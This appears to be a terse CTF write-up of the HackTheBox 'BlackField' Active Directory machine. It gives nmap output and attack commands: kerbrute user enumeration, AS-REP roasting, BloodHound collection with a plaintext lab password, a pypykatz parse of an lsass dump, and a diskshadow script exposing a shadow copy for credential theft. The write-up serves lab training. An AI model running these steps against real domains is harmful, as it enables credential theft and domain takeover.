HackTheBox-BlackField

NMAP

PORT      STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-01 02:43:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

PORT 139/445 (SMB)

Foothold

/opt/kerbrute/kerbrute_linux_amd64 userenum -d BLACKFIELD.local users.txt --dc 10.10.10.192
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -dc-ip 10.10.10.192 -usersfile users.txt BLACKFIELD/abc
python3 /opt/Python-Bloodhound/bloodhound.py -d BLACKFIELD.local -u 'support' -p '#00^BlackKnight' -c all -ns 10.10.10.192

Privilege Escalation (Audit2020)

Privilege Escalation (svc_backup)

/usr/local/bin/pypykatz lsa minidump lsass.DMP

Privilege Escalation (Administrator)

set context persistent nowriters
set metadata C:\temp\metdata.cab
set verbose on
add volume C: alias uwu
create
expose %uwu% f:

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

GalaxyBlitz’s Scam Proof 3诈骗证据3

Some thoughts after proposal 5 and 6

Reuse our moderately fun anti-phishing training

Citrix Just Suffered a Massive Data Breach.

{UPDATE} Look and Find® Elmo on Sesame Street Hack Free Resources Generator

Swissunion review – Is swissunion.net scam or good forex broker?

Scammer Phone Number Lookup: Unmask Suspicious Callers

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox-Cascade

Previse Writeup — HackTheBox

Bashed | HackTheBox writeup